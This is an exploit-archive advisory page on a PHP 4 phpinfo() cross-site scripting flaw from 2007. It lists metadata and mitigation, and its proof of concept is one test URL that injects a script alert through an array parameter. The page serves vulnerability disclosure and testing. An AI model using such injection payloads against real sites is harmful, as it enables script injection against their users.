header-logo
Suggest Exploit
vendor:
PHP
by:
Stefan Esser
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: PHP
Affected Version From: PHP 4
Affected Version To: PHP 4
Patch Exists: NO
Related CWE:
CPE: a:php:php:4
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP 4 – phpinfo() XSS

The vulnerability allows remote attackers to inject arbitrary web script or HTML via a parameter in the phpinfo() page.

Mitigation:

Update to a newer version of PHP or apply a patch to fix the vulnerability.
Source

Exploit-DB raw data:

  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //                    PHP 4 - phpinfo() XSS Testcase                  //
  ////////////////////////////////////////////////////////////////////////

To manually test for this vulnerability just call the phpinfo() page with a parameter like this.

http://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>

# milw0rm.com [2007-03-04]